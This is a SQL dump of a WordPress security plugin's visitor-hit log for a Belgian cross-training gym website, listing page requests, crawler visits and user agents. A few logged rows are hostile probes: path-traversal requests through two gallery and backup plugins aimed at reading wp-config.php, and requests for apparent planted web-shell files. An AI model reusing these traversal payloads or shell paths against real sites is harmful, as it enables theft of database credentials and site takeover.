(71772, 1494246958.304231, 1152705560, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(71773, 1494247092.519522, 1152705560, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'),
(71774, 1494247349.546496, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/pomo/7313581d9a.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71775, 1494248102.023743, 2953337008, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/includes/image-import.php', 'http://www.crosstrainingcenter.be/wp-admin/includes/image-import.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(71776, 1494249277.872435, 1554035825, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'https://www.google.fr/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71777, 1494249279.423356, 1554035825, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71778, 1494254084.748082, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(71779, 1494254085.953029, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(71780, 1494254085.989546, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(71781, 1494254086.431973, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(71782, 1494254088.464739, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(71783, 1494254101.591540, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(71784, 1494255766.833798, 3024883462, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71785, 1494259764.309703, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71786, 1494265890.794436, 3281714082, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/logo_img.php', 'http://www.crosstrainingcenter.be/wp-content/logo_img.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(71787, 1494266589.203991, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71788, 1494266589.846194, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71789, 1494266590.300409, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71790, 1494266590.709064, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71791, 1494266591.122221, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71792, 1494266591.553350, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71793, 1494266592.059685, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71794, 1494266592.493980, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71795, 1494266592.905362, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71796, 1494266593.316831, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71797, 1494266593.731377, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71798, 1494266915.277310, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71799, 1494266915.745109, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71800, 1494266916.267487, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71801, 1494266916.846895, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71802, 1494266917.364847, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71803, 1494266917.844576, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71804, 1494266918.513454, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71805, 1494266919.023773, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71806, 1494266919.542751, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71807, 1494266919.978685, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71808, 1494266920.497462, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71809, 1494267229.176996, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71810, 1494268127.841819, 1834596154, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),
(71811, 1494268129.028690, 1834596154, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),
(71812, 1494268528.906013, 1834596154, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),
(71813, 1494268546.558728, 1834596154, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),
(71814, 1494268550.960474, 1834596154, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),
(71815, 1494270755.026661, 1837484288, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71816, 1494272326.681037, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71817, 1494272327.270073, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71818, 1494272327.703217, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71819, 1494272328.139139, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71820, 1494272328.600458, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71821, 1494272329.086642, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71822, 1494272329.607142, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71823, 1494272330.036402, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71824, 1494272330.540028, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71825, 1494272330.963252, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71826, 1494272331.453124, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71827, 1494275150.206037, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71828, 1494278744.809661, 2509961370, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71829, 1494278754.125085, 2509961370, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71830, 1494278773.016580, 2509961370, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71831, 1494278778.620138, 2509961370, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71832, 1494278809.290686, 2509961370, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71833, 1494278955.969198, 2509961370, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71834, 1494278964.489046, 2509961370, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/25.0.152548370 Mobile/14D27 Safari/602.1'),
(71835, 1494283069.568827, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71836, 1494283070.038105, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71837, 1494283386.759816, 676177671, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71838, 1494285198.511690, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71839, 1494288886.226405, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71840, 1494289614.878640, 1311661259, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71841, 1494294428.733103, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71842, 1494299554.853202, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-vertical-gallery/readme.txt', 'http://crosstrainingcenter.be/wp-content/plugins/wp-vertical-gallery/readme.txt', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(71843, 1494299909.050327, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71844, 1494302313.934127, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71845, 1494303663.123005, 1837931087, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://lm.facebook.com/l.php?u=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&h=ATOMjFE5MznW84lTKIcod8v12FuxxOSmKFUcS9DjpQmihlxuRrU9ABOV78tNt59H0g8ATh75ObJ69xBmBYbPun-fNQIsofkChyeT84zlgiCd__yH7axRSbBGdmZ7s9kbX4aH3gCA', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71846, 1494303665.175994, 1837931087, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71847, 1494303683.150096, 1837931087, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71848, 1494303687.414952, 1837931087, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71849, 1494303724.394978, 1837931087, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71850, 1494303728.417382, 1837931087, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71851, 1494303802.842346, 1837931087, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G903F/G903FXXU1BPD4 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71852, 1494304001.679519, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71853, 1494305234.709946, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71854, 1494306424.870542, 2916143010, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/license.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(71855, 1494306427.829861, 2916143010, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/license.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(71856, 1494309149.786821, 1837924479, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71857, 1494309150.352525, 1837924479, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71858, 1494309150.829381, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71859, 1494309151.329802, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71860, 1494309151.815545, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71861, 1494309152.265224, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71862, 1494309152.811814, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71863, 1494309153.259518, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71864, 1494309153.701339, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71865, 1494309154.137824, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71866, 1494309154.574246, 1837924479, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71867, 1494310131.954654, 736163900, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(71868, 1494313874.316049, 3427775560, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)'),
(71869, 1494313994.105709, 3475901715, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71870, 1494318645.739710, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71871, 1494323207.771674, 1123631176, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71872, 1494323208.815012, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71873, 1494324401.853040, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71874, 1494326598.886505, 2637637383, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71875, 1494326599.235889, 2637637383, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71876, 1494326900.730853, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(71877, 1494326901.370062, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(71878, 1494327567.141032, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71879, 1494328330.924509, 3259896531, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(71880, 1494328332.591559, 3259896531, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
